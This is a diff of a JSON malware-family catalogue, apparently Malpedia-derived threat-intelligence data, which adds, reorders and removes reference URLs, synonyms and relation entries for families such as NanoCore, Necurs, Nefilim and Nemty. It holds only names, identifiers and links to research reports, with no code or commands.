+ "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
"https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
"https://community.riskiq.com/article/24759ad2",
- "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/",
- "https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-spoofs-philippine-government-covid-19-health-data-widespread",
+ "https://intel471.com/blog/privateloader-malware",
+ "https://www.secureworks.com/research/darktortilla-malware-analysis",
"https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://blog.morphisec.com/syk-crypter-discord",
- "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://zero2auto.com/2020/06/07/dealing-with-obfuscated-macros/",
+ "https://malwareindepth.com/defeating-nanocore-and-cypherit/",
+ "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
+ "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
+ "https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/",
+ "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.Nanocore",
+ "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
"https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html",
+ "https://community.riskiq.com/article/ade260c6",
+ "https://blog.morphisec.com/syk-crypter-discord",
+ "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
+ "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
+ "https://medium.com/@M3HS1N/malware-analysis-nanocore-rat-6cae8c6df918",
+ "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/",
+ "https://medium.com/@the_abjuri5t/nanocore-rat-hunting-guide-cb185473c1e0",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire",
+ "https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat",
+ "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
+ "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
+ "https://www.crowdstrike.com/blog/weaponizing-disk-image-files-analysis/",
+ "https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/elfin-indictments-iran-espionage",
- "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage"
+ "https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-spoofs-philippine-government-covid-19-health-data-widespread",
+ "https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html",
+ "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/",
+ "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
+ "https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://assets.virustotal.com/reports/2021trends.pdf",
+ "https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/"
],
"synonyms": [
"Nancrat",
@@ -33209,13 +35035,26 @@
"uuid": "00e1373c-fddf-4b06-9770-e980cc0ada6b",
"value": "NanoLocker"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.naplistener",
+ "https://www.elastic.co/de/security-labs/naplistener-more-bad-dreams-from-the-developers-of-siestagraph"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c5a291c8-c317-48b4-aad1-d5e9d68c2fc5",
+ "value": "NAPLISTENER"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.narilam",
- "https://www.symantec.com/connect/blogs/w32narilam-business-database-sabotage",
- "http://contagiodump.blogspot.com/2012/12/nov-2012-w32narilam-sample.html"
+ "http://contagiodump.blogspot.com/2012/12/nov-2012-w32narilam-sample.html",
+ "https://www.symantec.com/connect/blogs/w32narilam-business-database-sabotage"
],
"synonyms": [],
"type": []
@@ -33228,22 +35067,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nautilus",
- "https://www.ncsc.gov.uk/alerts/turla-group-malware",
"https://www.secureworks.com/research/threat-profiles/iron-hunter",
+ "https://www.ncsc.gov.uk/alerts/turla-group-malware",
"https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "73cb7ecc-25e3-11e8-a97b-c35ec4e7dcf8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "d8295eba-60ef-4900-8091-d694180de565",
"value": "Nautilus"
},
@@ -33252,11 +35082,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.navrat",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://norfolkinfosec.com/how-to-analyzing-a-malicious-hangul-word-processor-document-from-a-dprk-threat-actor-group/",
+ "https://www.youtube.com/watch?v=rfzmHjZX70s",
"https://blog.talosintelligence.com/2018/05/navrat.html?m=1",
"https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf",
- "https://www.youtube.com/watch?v=rfzmHjZX70s",
- "https://norfolkinfosec.com/how-to-analyzing-a-malicious-hangul-word-processor-document-from-a-dprk-threat-actor-group/"
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf"
],
"synonyms": [
"JinhoSpy"
@@ -33271,14 +35101,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ncctrojan",
- "https://www.socinvestigation.com/chinese-new-backdoor-deployed-for-cyberespionage/",
- "https://vblocalhost.com/uploads/VB2020-20.pdf",
- "https://sebdraven.medium.com/actor-behind-operation-lagtime-targets-russia-f8c277dc52a9",
- "https://twitter.com/ESETresearch/status/1441139057682104325?s=20",
"https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf",
+ "https://www.youtube.com/watch?v=1WfPlgtfWnQ",
"https://insight-jp.nttsecurity.com/post/102gr6l/ta428ncctrojan",
- "https://www.youtube.com/watch?v=1WfPlgtfWnQ"
+ "https://sebdraven.medium.com/actor-behind-operation-lagtime-targets-russia-f8c277dc52a9",
+ "https://vblocalhost.com/uploads/VB2020-20.pdf",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf",
+ "https://www.socinvestigation.com/chinese-new-backdoor-deployed-for-cyberespionage/",
+ "https://twitter.com/ESETresearch/status/1441139057682104325?s=20"
],
"synonyms": [],
"type": []
@@ -33291,10 +35121,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nebulae",
- "https://www.securityweek.com/chinese-cyberspies-target-military-organizations-asia-new-malware",
- "https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf",
"https://www.bleepingcomputer.com/news/security/cyberspies-target-military-organizations-with-new-nebulae-backdoor/",
+ "https://www.securityweek.com/chinese-cyberspies-target-military-organizations-asia-new-malware",
"https://twitter.com/SyscallE/status/1390339497804636166",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf",
"https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos"
],
"synonyms": [],
@@ -33308,41 +35138,33 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.necurs",
- "https://intel471.com/blog/a-brief-history-of-ta505",
- "https://research.nccgroup.com/2021/12/01/tracking-a-p2p-network-related-with-ta505/",
- "https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/",
- "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
- "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf",
- "http://www.secureworks.com/research/threat-profiles/gold-riverview",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/",
- "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/",
- "https://cofense.com/necurs-targeting-banks-pub-file-drops-flawedammyy/",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
"https://blogs.microsoft.com/on-the-issues/2020/03/10/necurs-botnet-cyber-crime-disrupt/",
- "https://www.secureworks.com/research/threat-profiles/gold-riverview",
- "https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
"http://blog.talosintelligence.com/2017/03/necurs-diversifies.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/",
+ "https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf",
+ "http://www.secureworks.com/research/threat-profiles/gold-riverview",
+ "https://bin.re/blog/the-dgas-of-necurs/",
+ "https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs",
"https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors",
- "https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features",
- "https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/"
+ "https://www.secureworks.com/research/threat-profiles/gold-riverview",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/",
+ "https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://intel471.com/blog/a-brief-history-of-ta505",
+ "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf",
+ "https://research.nccgroup.com/2021/12/01/tracking-a-p2p-network-related-with-ta505/",
+ "https://cofense.com/necurs-targeting-banks-pub-file-drops-flawedammyy/",
+ "https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features"
],
"synonyms": [
"nucurs"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "97d34770-44cc-4ecb-bdce-ba11581c0e2a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "53ad08a6-cca9-401a-a6da-3c0bff2890eb",
"value": "Necurs"
},
@@ -33365,35 +35187,35 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nefilim",
- "https://id-ransomware.blogspot.com/2020/03/nefilim-ransomware.html",
- "https://securelist.com/evolution-of-jsworm-ransomware/102428/",
- "https://blog.qualys.com/vulnerabilities-research/2021/05/12/nefilim-ransomware",
- "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
- "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
- "https://www.trendmicro.com/en_us/research/21/b/nefilim-ransomware.html",
- "https://documents.trendmicro.com/assets/white_papers/wp-modern-ransomwares-double-extortion-tactics.pdf",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
- "https://www.trendmicro.com/en_us/research/21/f/nefilim-modern-ransomware-attack-story.html",
- "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
- "https://www.cert.govt.nz/it-specialists/advisories/active-ransomware-campaign-leveraging-remote-access-technologies/",
- "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://www.picussecurity.com/resource/blog/how-to-beat-nefilim-ransomware-attacks",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot",
"https://intel471.com/blog/how-cybercriminals-create-turbulence-for-the-transportation-industry",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/nefilim-ransomware-threatens-to-expose-stolen-data",
- "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
- "http://www.secureworks.com/research/threat-profiles/gold-mansard",
- "https://www.bleepingcomputer.com/news/security/home-appliance-giant-whirlpool-hit-in-nefilim-ransomware-attack/",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
- "https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://news.sophos.com/en-us/2021/01/26/nefilim-ransomware-attack-uses-ghost-credentials/",
+ "https://www.trendmicro.com/en_us/research/21/b/nefilim-ransomware.html",
"https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
- "https://news.sophos.com/en-us/2021/01/26/nefilim-ransomware-attack-uses-ghost-credentials/"
+ "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
+ "https://blog.qualys.com/vulnerabilities-research/2021/05/12/nefilim-ransomware",
+ "https://www.bleepingcomputer.com/news/security/home-appliance-giant-whirlpool-hit-in-nefilim-ransomware-attack/",
+ "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
+ "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot",
+ "https://www.trendmicro.com/en_us/research/21/f/nefilim-modern-ransomware-attack-story.html",
+ "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/nefilim-ransomware-threatens-to-expose-stolen-data",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "http://www.secureworks.com/research/threat-profiles/gold-mansard",
+ "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
+ "https://id-ransomware.blogspot.com/2020/03/nefilim-ransomware.html",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/",
+ "https://www.cert.govt.nz/it-specialists/advisories/active-ransomware-campaign-leveraging-remote-access-technologies/",
+ "https://www.picussecurity.com/resource/blog/how-to-beat-nefilim-ransomware-attacks",
+ "https://securelist.com/evolution-of-jsworm-ransomware/102428/",
+ "https://documents.trendmicro.com/assets/white_papers/wp-modern-ransomwares-double-extortion-tactics.pdf"
],
"synonyms": [
"Nephilim"
@@ -33403,6 +35225,21 @@
"uuid": "895f088e-a862-462c-a754-6593c6a471da",
"value": "Nefilim"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemesis",
+ "https://securityintelligence.com/posts/ex-conti-fin7-actors-collaborate-new-domino-backdoor"
+ ],
+ "synonyms": [
+ "Project Nemesis"
+ ],
+ "type": []
+ },
+ "uuid": "2f115fca-2f72-4c20-a93e-9618e51f6e2b",
+ "value": "Nemesis"
+ },
{
"description": "",
"meta": {
@@ -33424,33 +35261,33 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nemty",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://securelist.com/evolution-of-jsworm-ransomware/102428/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet",
- "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
- "https://www.sentinelone.com/labs/karma-ransomware-an-emerging-threat-with-a-hint-of-nemty-pedigree/",
- "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://www.fortinet.com/blog/threat-research/nemty-ransomware-early-stage-threat.html",
- "https://medium.com/csis-techblog/the-nemty-affiliate-model-13f5cf7ab66b",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://www.tesorion.nl/en/posts/nemty-update-decryptors-for-nemty-1-5-and-1-6/",
- "https://github.com/albertzsigovits/malware-notes/blob/master/Nemty.md",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://www.bleepingcomputer.com/news/security/fake-paypal-site-spreads-nemty-ransomware/",
- "https://www.bleepingcomputer.com/news/security/new-nemty-ransomware-may-spread-via-compromised-rdp-connections/",
"https://www.bleepingcomputer.com/news/security/nemty-ransomware-gets-distribution-from-rig-exploit-kit/",
"https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/",
- "https://www.tesorion.nl/nemty-update-decryptors-for-nemty-1-5-and-1-6/",
+ "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/Nemty.md",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://www.fortinet.com/blog/threat-research/nemty-ransomware-early-stage-threat.html",
+ "https://www.bleepingcomputer.com/news/security/fake-paypal-site-spreads-nemty-ransomware/",
"http://www.secureworks.com/research/threat-profiles/gold-mansard",
- "https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-08-24-nemty-ransomware-notes.vk.raw",
- "https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/nemty-ransomware-learning-by-doing/",
- "https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/",
"https://www.bleepingcomputer.com/news/security/nemty-ransomware-decryptor-released-recover-files-for-free/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf"
+ "https://www.sentinelone.com/labs/karma-ransomware-an-emerging-threat-with-a-hint-of-nemty-pedigree/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet",
+ "https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-08-24-nemty-ransomware-notes.vk.raw",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/nemty-ransomware-learning-by-doing/",
+ "https://www.tesorion.nl/nemty-update-decryptors-for-nemty-1-5-and-1-6/",
+ "https://medium.com/csis-techblog/the-nemty-affiliate-model-13f5cf7ab66b",
+ "https://securelist.com/evolution-of-jsworm-ransomware/102428/",
+ "https://www.bleepingcomputer.com/news/security/new-nemty-ransomware-may-spread-via-compromised-rdp-connections/",
+ "https://www.tesorion.nl/en/posts/nemty-update-decryptors-for-nemty-1-5-and-1-6/"
],
"synonyms": [],
"type": []
@@ -33472,13 +35309,13 @@
"value": "Nerbian RAT"
},
{
- "description": "Neshta is a 2005 Belarusian file infector virus . The name of the virus comes from the Belarusian word \"nesta\" meaning \"something.\" The program is a Windows application (exe file). Written in Delphi . The size of the original malicious file is 41,472 bytes . This file virus is the type of virus that is no longer popular at present.",
+ "description": "Neshta is a 2005 Belarusian file infector virus written in Delphi. The name of the virus comes from the Belarusian word \"nesta\" meaning \"something.\"",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.neshta",
- "https://threatvector.cylance.com/en_us/home/threat-spotlight-neshta-file-infector-endures.html",
- "https://www.mandiant.com/resources/pe-file-infecting-malware-ot",
"https://www.virusbulletin.com/virusbulletin/2014/08/bird-s-nest",
+ "https://www.mandiant.com/resources/pe-file-infecting-malware-ot",
+ "https://threatvector.cylance.com/en_us/home/threat-spotlight-neshta-file-infector-endures.html",
"https://www.virusradar.com/en/Win32_Neshta.A/description"
],
"synonyms": [],
@@ -33492,11 +35329,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nestegg",
- "https://youtu.be/8hJyLkLHH8Q?t=1208",
"https://youtu.be/_kzFNQySEMw?t=789",
"https://www.documentcloud.org/documents/4834259-Park-Jin-Hyok-Complaint.html",
- "https://content.fireeye.com/apt/rpt-apt38",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180231/LazarusUnderTheHood_PDF_final_for_securelist.pdf"
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180231/LazarusUnderTheHood_PDF_final_for_securelist.pdf",
+ "https://youtu.be/8hJyLkLHH8Q?t=1208",
+ "https://content.fireeye.com/apt/rpt-apt38"
],
"synonyms": [],
"type": []
@@ -33535,9 +35372,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.neteagle",
+ "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf",
"https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/",
- "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf"
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/"
],
"synonyms": [
"Neteagle_Scout",
@@ -33545,15 +35382,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "0ee08ab5-140c-44c3-9b0a-4a352500b14e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "3bb8052e-8ed2-48e3-a2cf-7358bae8c6b5",
"value": "NETEAGLE"
},
@@ -33562,13 +35390,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.netfilter",
- "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html",
- "https://www.gdatasoftware.com/blog/microsoft-signed-a-malicious-netfilter-rootkit",
"https://www.bitdefender.com/files/News/CaseStudies/study/405/Bitdefender-DT-Whitepaper-Fivesys-creat5699-en-EN.pdf",
+ "https://www.gdatasoftware.com/blog/microsoft-signed-a-malicious-netfilter-rootkit",
+ "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html",
+ "https://www.vice.com/en/article/pkbzxv/hackers-tricked-microsoft-into-certifying-malware-that-could-spy-on-users",
"https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/",
- "https://blog.360totalsecurity.com/en/netfilter-rootkit-ii-continues-to-hold-whql-signatures/",
"https://www.intezer.com/blog/malware-analysis/fast-insights-for-a-microsoft-signed-netfilter-rootkit/",
- "https://www.vice.com/en/article/pkbzxv/hackers-tricked-microsoft-into-certifying-malware-that-could-spy-on-users"
+ "https://blog.360totalsecurity.com/en/netfilter-rootkit-ii-continues-to-hold-whql-signatures/"
],
"synonyms": [],
"type": []
@@ -33620,17 +35448,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat",
- "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee",
+ "https://asec.ahnlab.com/en/45312/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/",
"https://researchcenter.paloaltonetworks.com/2017/09/unit42-hoeflertext-popups-targeting-google-chrome-users-now-pushing-rat-malware/",
- "https://www.esentire.com/blog/fake-chrome-setup-leads-to-netsupportmanager-rat-and-mars-stealer",
- "http://www.netsupportmanager.com/index.asp",
+ "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee",
+ "https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html",
"https://www.bleepingcomputer.com/news/security/malicious-web-redirect-service-infects-16-500-sites-to-push-malware/",
+ "https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html",
+ "https://www.esentire.com/blog/fake-chrome-setup-leads-to-netsupportmanager-rat-and-mars-stealer",
+ "https://www.trendmicro.com/en_us/research/23/c/new-opcjacker-malware-distributed-via-fake-vpn-malvertising.html",
"https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/",
"https://decoded.avast.io/janrubin/parrot-tds-takes-over-web-servers-and-threatens-millions/",
"https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
- "https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/",
- "https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html"
+ "http://www.netsupportmanager.com/index.asp"
],
"synonyms": [
"NetSupport"
@@ -33645,8 +35475,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nettraveler",
- "https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests",
"https://cybergeeks.tech/dissecting-apt21-samples-using-a-step-by-step-approach/",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170728/Guerrero-Saade-Raiu-VB2017.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests",
